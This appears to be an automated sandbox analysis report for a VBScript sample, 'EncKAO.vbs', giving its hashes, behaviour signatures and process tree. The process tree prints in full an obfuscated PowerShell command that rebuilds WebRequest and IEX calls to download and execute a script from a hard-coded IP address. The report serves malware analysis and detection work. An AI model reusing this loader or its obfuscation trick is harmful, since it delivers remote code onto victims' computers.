Analysis
-
max time kernel
118s -
max time network
131s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
22-02-2022 19:06
General
-
Target
EncKAO.vbs
-
Size
3KB
-
MD5
fa584c2b021aed55aff0c764aee1cff0
-
SHA1
327e83c2886c42896804ab87ca6996cb621e9b71
-
SHA256
1b956ea6626165956ea897d431801376e7189f96e149de1b2ee2fed6944a38b2
-
SHA512
a3db7960aa642cd61f499bda0f5892d2b7f939a65252842651472e963ca24ae9ebc7e51cb95e5c424b5dc8b0316333268edb902bb1be713621e4e11c5ecbe18e
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EncKAO.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HCNPXUQJCLATJSNVPNHGASK = '[*4@!-95&[27011]{{<!4(}y*4@!-95&[27011]{{<!4(}t3{{!{39=335@-#%2^${![292#\&3/-4=3%^]+\@8_#2}.IO.*4@!-95&[27011]{{<!4(}t()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{92#\&3/-4=3%^]+\@8_#2}()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{d3{{!{39=335@-#%2^${![2()&/@+/6!@3=1*&#^285<5]'.Replace('*4@!-95&[27011]{{<!4(}','S').Replace('3{{!{39=335@-#%2^${![2','E').Replace('()&/@+/6!@3=1*&#^285<5','R').Replace('5_8%0=^\09<276{[=(-\-{','A').Replace('92#\&3/-4=3%^]+\@8_#2}','M');$HWBPFQSKIJPSNVWGRPDVWTQ = ($HCNPXUQJCLATJSNVPNHGASK -Join '')|&('I'+'EX');$HVVGCGZUOWJPPVKKFNXPRYX = '[-<@!(_!_@2#@@73#6#<*68y-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2/=+\6{8&8!=%9$&6%0#$!1m.N/=+\6{8&8!=%9$&6%0#$!134^%[/28$^_^1)_+%&$}{2.W/=+\6{8&8!=%9$&6%0#$!1bR/=+\6{8&8!=%9$&6%0#$!1qu/=+\6{8&8!=%9$&6%0#$!1-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2]'.Replace('-<@!(_!_@2#@@73#6#<*68','S').Replace('/=+\6{8&8!=%9$&6%0#$!1','E').Replace('34^%[/28$^_^1)_+%&$}{2','T');$HZSWCZCRBXDIWQKWTESQTIY = ($HVVGCGZUOWJPPVKKFNXPRYX -Join '')|&('I'+'EX');$HFJRRSZDESQZWRCXANLTRDS = '\=)9&+81%{23</-^[/=-[6r7-{)&9)1(!_(2]+86%-(=5a+8#6&}]%/5}-^]%]5<#$7+7-{)&9)1(!_(2]+86%-(=5'.Replace('\=)9&+81%{23</-^[/=-[6','C').Replace('7-{)&9)1(!_(2]+86%-(=5','E').Replace('+8#6&}]%/5}-^]%]5<#$7+','T');$HWCLNHXSDRQHGEGSDTPUANI = '$#][}(-9<9$33&7@-{54#^-0@}{9!{69/<}19_19+_5&tR-0@}{9!{69/<}19_19+_5&0$}\+-8(030\)(%<}^/736pon0$}\+-8(030\)(%<}^/736-0@}{9!{69/<}19_19+_5&'.Replace('$#][}(-9<9$33&7@-{54#^','G').Replace('-0@}{9!{69/<}19_19+_5&','E').Replace('0$}\+-8(030\)(%<}^/736','S');$HUNOTPOSFQRHVLUSSYXPQCA = 'G_]@_61$7+/%50=7%)5}$+*t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[pon43=743-[#=!81/<[(**(<[_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*am'.Replace('43=743-[#=!81/<[(**(<[','S').Replace('_]@_61$7+/%50=7%)5}$+*','E').Replace('(#(&<<]#_^68#}}%]-#61#','R');$HHGZUQOYZVBAZGKFOKONHQP = '{[)9)4\#-&640<2_1%000//30#)6832^&7)=]=!{%8-_a20&[#8=\]=4}\*/8^-5_^+To/30#)6832^&7)=]=!{%8-_n20&[#8=\]=4}\*/8^-5_^+'.Replace('{[)9)4\#-&640<2_1%000/','R').Replace('/30#)6832^&7)=]=!{%8-_','E').Replace('20&[#8=\]=4}\*/8^-5_^+','D');&('I'+'EX')($HWBPFQSKIJPSNVWGRPDVWTQ::new($HZSWCZCRBXDIWQKWTESQTIY::$HFJRRSZDESQZWRCXANLTRDS('HttP://3.145.46.6/K/ServerFAH.txt').$HWCLNHXSDRQHGEGSDTPUANI().$HUNOTPOSFQRHVLUSSYXPQCA()).$HHGZUQOYZVBAZGKFOKONHQP())2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
12KB
-
Filesize
11.4MB
-
Filesize
124KB
-
Filesize
8KB